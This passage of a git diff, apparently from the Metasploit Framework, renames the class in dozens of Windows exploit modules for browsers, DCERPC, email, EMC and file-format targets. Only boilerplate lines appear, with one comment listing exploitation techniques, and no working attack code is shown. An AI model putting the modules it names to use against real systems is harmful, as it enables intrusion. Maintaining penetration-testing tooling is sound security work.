Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/winzip_fileview.rb b/modules/exploits/windows/browser/winzip_fileview.rb index 733781eeb9..725d4f1f67 100644 --- a/modules/exploits/windows/browser/winzip_fileview.rb +++ b/modules/exploits/windows/browser/winzip_fileview.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/wmi_admintools.rb b/modules/exploits/windows/browser/wmi_admintools.rb index 69975b84ce..085e90f186 100644 --- a/modules/exploits/windows/browser/wmi_admintools.rb +++ b/modules/exploits/windows/browser/wmi_admintools.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb b/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb index eb12c2cf16..7a0c664d80 100644 --- a/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb +++ b/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/xmplay_asx.rb b/modules/exploits/windows/browser/xmplay_asx.rb index ebd19f155b..4e53c13709 100644 --- a/modules/exploits/windows/browser/xmplay_asx.rb +++ b/modules/exploits/windows/browser/xmplay_asx.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/yahoomessenger_fvcom.rb b/modules/exploits/windows/browser/yahoomessenger_fvcom.rb index 964e85078a..6fdd49587e 100644 --- a/modules/exploits/windows/browser/yahoomessenger_fvcom.rb +++ b/modules/exploits/windows/browser/yahoomessenger_fvcom.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/yahoomessenger_server.rb b/modules/exploits/windows/browser/yahoomessenger_server.rb index d0c27f9a79..96d12e137b 100644 --- a/modules/exploits/windows/browser/yahoomessenger_server.rb +++ b/modules/exploits/windows/browser/yahoomessenger_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb index e23946a957..ce4d676070 100644 --- a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb +++ b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb index b9c9da7626..6e66961670 100644 --- a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb +++ b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb index 94ddc31c7f..c96e02efd9 100644 --- a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb +++ b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/dcerpc/ms05_017_msmq.rb b/modules/exploits/windows/dcerpc/ms05_017_msmq.rb index 5c2fe7dd4a..7c1644a853 100644 --- a/modules/exploits/windows/dcerpc/ms05_017_msmq.rb +++ b/modules/exploits/windows/dcerpc/ms05_017_msmq.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb b/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb index 85b998afba..3a1fb0408b 100644 --- a/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb +++ b/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/dcerpc/ms07_065_msmq.rb b/modules/exploits/windows/dcerpc/ms07_065_msmq.rb index 0aa1a5e6d2..dd935ca56b 100644 --- a/modules/exploits/windows/dcerpc/ms07_065_msmq.rb +++ b/modules/exploits/windows/dcerpc/ms07_065_msmq.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb b/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb index f91b362c43..6f5aa83335 100644 --- a/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb index 30c77f5b73..9f479be312 100644 --- a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb +++ b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking # This module acts as an HTTP server diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb index 645223a004..609af5543f 100644 --- a/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb +++ b/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking # This module acts as an HTTP server diff --git a/modules/exploits/windows/emc/alphastor_agent.rb b/modules/exploits/windows/emc/alphastor_agent.rb index a7e11d39b5..07697ef91d 100644 --- a/modules/exploits/windows/emc/alphastor_agent.rb +++ b/modules/exploits/windows/emc/alphastor_agent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/emc/alphastor_device_manager_exec.rb b/modules/exploits/windows/emc/alphastor_device_manager_exec.rb index 7a10b9e5db..1ac3b2d0fd 100644 --- a/modules/exploits/windows/emc/alphastor_device_manager_exec.rb +++ b/modules/exploits/windows/emc/alphastor_device_manager_exec.rb @@ -1,6 +1,6 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/emc/networker_format_string.rb b/modules/exploits/windows/emc/networker_format_string.rb index 8f932b79a6..acbae74556 100644 --- a/modules/exploits/windows/emc/networker_format_string.rb +++ b/modules/exploits/windows/emc/networker_format_string.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/windows/emc/replication_manager_exec.rb b/modules/exploits/windows/emc/replication_manager_exec.rb index 0f504efc1a..d053f2fdad 100644 --- a/modules/exploits/windows/emc/replication_manager_exec.rb +++ b/modules/exploits/windows/emc/replication_manager_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb b/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb index 8f1e0b300f..d356673194 100644 --- a/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb +++ b/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/abbs_amp_lst.rb b/modules/exploits/windows/fileformat/abbs_amp_lst.rb index 778be2f254..b5b5df41ca 100644 --- a/modules/exploits/windows/fileformat/abbs_amp_lst.rb +++ b/modules/exploits/windows/fileformat/abbs_amp_lst.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb b/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb index 93eb63e8f6..d3ba10d458 100644 --- a/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb +++ b/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/acdsee_xpm.rb b/modules/exploits/windows/fileformat/acdsee_xpm.rb index 86a72a0669..d0e2e16721 100644 --- a/modules/exploits/windows/fileformat/acdsee_xpm.rb +++ b/modules/exploits/windows/fileformat/acdsee_xpm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/actfax_import_users_bof.rb b/modules/exploits/windows/fileformat/actfax_import_users_bof.rb index 517398598e..81a9d67736 100644 --- a/modules/exploits/windows/fileformat/actfax_import_users_bof.rb +++ b/modules/exploits/windows/fileformat/actfax_import_users_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/activepdf_webgrabber.rb b/modules/exploits/windows/fileformat/activepdf_webgrabber.rb index 86bc6f656c..b53d2e1068 100644 --- a/modules/exploits/windows/fileformat/activepdf_webgrabber.rb +++ b/modules/exploits/windows/fileformat/activepdf_webgrabber.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb b/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb index 3644311a25..63bc9c8fcf 100644 --- a/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb +++ b/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb index b88ad8e02a..6af35d6482 100644 --- a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb +++ b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # aslr+dep bypass, js heap spray, rop, stack bof include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb b/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb index 4a0687d996..57d50e1f20 100644 --- a/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb +++ b/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb b/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb index 2f5ee29862..f1435ffe44 100644 --- a/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb +++ b/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb b/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb index 697280e6f1..e73645b2ee 100644 --- a/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb +++ b/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_geticon.rb b/modules/exploits/windows/fileformat/adobe_geticon.rb index c2171452c4..d67d68d24f 100644 --- a/modules/exploits/windows/fileformat/adobe_geticon.rb +++ b/modules/exploits/windows/fileformat/adobe_geticon.rb @@ -7,7 +7,7 @@ require 'msf/core/exploit/pdf' require 'msf/core' require 'zlib' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb b/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb index c731e1d16c..5e4d7de6d3 100644 --- a/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb +++ b/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_jbig2decode.rb b/modules/exploits/windows/fileformat/adobe_jbig2decode.rb index 9179308d2f..f47602744f 100644 --- a/modules/exploits/windows/fileformat/adobe_jbig2decode.rb +++ b/modules/exploits/windows/fileformat/adobe_jbig2decode.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_libtiff.rb b/modules/exploits/windows/fileformat/adobe_libtiff.rb index b5f4de444f..2a1bd72bf5 100644 --- a/modules/exploits/windows/fileformat/adobe_libtiff.rb +++ b/modules/exploits/windows/fileformat/adobe_libtiff.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_media_newplayer.rb b/modules/exploits/windows/fileformat/adobe_media_newplayer.rb index 1c9c76bfb7..3abbfeaee9 100644 --- a/modules/exploits/windows/fileformat/adobe_media_newplayer.rb +++ b/modules/exploits/windows/fileformat/adobe_media_newplayer.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb index a4c8a3f74a..49bb5b8e07 100644 --- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb +++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::PDF_Parse diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb index 9784381028..b5658a0430 100644 --- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb +++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb @@ -17,7 +17,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_reader_u3d.rb b/modules/exploits/windows/fileformat/adobe_reader_u3d.rb index a5e9289326..fd420091a1 100644 --- a/modules/exploits/windows/fileformat/adobe_reader_u3d.rb +++ b/modules/exploits/windows/fileformat/adobe_reader_u3d.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_toolbutton.rb b/modules/exploits/windows/fileformat/adobe_toolbutton.rb index 5c4bd3bdfd..caa942dc5e 100644 --- a/modules/exploits/windows/fileformat/adobe_toolbutton.rb +++ b/modules/exploits/windows/fileformat/adobe_toolbutton.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb b/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb index 2d58380935..a64fa5f6ba 100644 --- a/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb +++ b/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_utilprintf.rb b/modules/exploits/windows/fileformat/adobe_utilprintf.rb index 9f7a3060b5..03dda02143 100644 --- a/modules/exploits/windows/fileformat/adobe_utilprintf.rb +++ b/modules/exploits/windows/fileformat/adobe_utilprintf.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb b/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb index e47e35a33b..396176bf0d 100644 --- a/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb +++ b/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/altap_salamander_pdb.rb b/modules/exploits/windows/fileformat/altap_salamander_pdb.rb index d858b33316..4d85c1fae8 100644 --- a/modules/exploits/windows/fileformat/altap_salamander_pdb.rb +++ b/modules/exploits/windows/fileformat/altap_salamander_pdb.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/aol_desktop_linktag.rb b/modules/exploits/windows/fileformat/aol_desktop_linktag.rb index dd69b138d1..d807274f3f 100644 --- a/modules/exploits/windows/fileformat/aol_desktop_linktag.rb +++ b/modules/exploits/windows/fileformat/aol_desktop_linktag.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/aol_phobos_bof.rb b/modules/exploits/windows/fileformat/aol_phobos_bof.rb index d8ecbe5739..53c044328a 100644 --- a/modules/exploits/windows/fileformat/aol_phobos_bof.rb +++ b/modules/exploits/windows/fileformat/aol_phobos_bof.rb @@ -29,7 +29,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb b/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb index a12644c51b..ed6dd402c0 100644 --- a/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb +++ b/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/apple_quicktime_texml.rb b/modules/exploits/windows/fileformat/apple_quicktime_texml.rb index fad009f7cb..e2ef03ffb9 100644 --- a/modules/exploits/windows/fileformat/apple_quicktime_texml.rb +++ b/modules/exploits/windows/fileformat/apple_quicktime_texml.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/audio_coder_m3u.rb b/modules/exploits/windows/fileformat/audio_coder_m3u.rb index 26be3e5272..677b09c960 100644 --- a/modules/exploits/windows/fileformat/audio_coder_m3u.rb +++ b/modules/exploits/windows/fileformat/audio_coder_m3u.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/audio_wkstn_pls.rb b/modules/exploits/windows/fileformat/audio_wkstn_pls.rb index 98b67355de..c59964b672 100644 --- a/modules/exploits/windows/fileformat/audio_wkstn_pls.rb +++ b/modules/exploits/windows/fileformat/audio_wkstn_pls.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/audiotran_pls.rb b/modules/exploits/windows/fileformat/audiotran_pls.rb index 5ffed42488..098c82121b 100644 --- a/modules/exploits/windows/fileformat/audiotran_pls.rb +++ b/modules/exploits/windows/fileformat/audiotran_pls.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/audiotran_pls_1424.rb b/modules/exploits/windows/fileformat/audiotran_pls_1424.rb index 8b9aec6fa3..2d824873e9 100644 --- a/modules/exploits/windows/fileformat/audiotran_pls_1424.rb +++ b/modules/exploits/windows/fileformat/audiotran_pls_1424.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb b/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb index c52224e5d9..cf3be4cdb6 100644 --- a/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb +++ b/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/bacnet_csv.rb b/modules/exploits/windows/fileformat/bacnet_csv.rb index ab47486661..dd284bb9b9 100644 --- a/modules/exploits/windows/fileformat/bacnet_csv.rb +++ b/modules/exploits/windows/fileformat/bacnet_csv.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb b/modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb index d242391c9f..9cce4f1ed1 100644 --- a/modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb +++ b/modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/blazedvd_plf.rb b/modules/exploits/windows/fileformat/blazedvd_plf.rb index 696949f650..e8e7b6feb9 100644 --- a/modules/exploits/windows/fileformat/blazedvd_plf.rb +++ b/modules/exploits/windows/fileformat/blazedvd_plf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb b/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb index e3187673e7..eb1382c2c9 100644 --- a/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb +++ b/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/bsplayer_m3u.rb b/modules/exploits/windows/fileformat/bsplayer_m3u.rb index db7439401e..ac074a89b7 100644 --- a/modules/exploits/windows/fileformat/bsplayer_m3u.rb +++ b/modules/exploits/windows/fileformat/bsplayer_m3u.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ca_cab.rb b/modules/exploits/windows/fileformat/ca_cab.rb index f7307bc680..a596d254fc 100644 --- a/modules/exploits/windows/fileformat/ca_cab.rb +++ b/modules/exploits/windows/fileformat/ca_cab.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb b/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb index f5b1d606db..b9960e6c1d 100644 --- a/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb +++ b/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb b/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb index e33a9dc17d..2eddd04730 100644 --- a/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb +++ b/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb b/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb index a5b5724efa..ead6de182e 100644 --- a/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb +++ b/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < 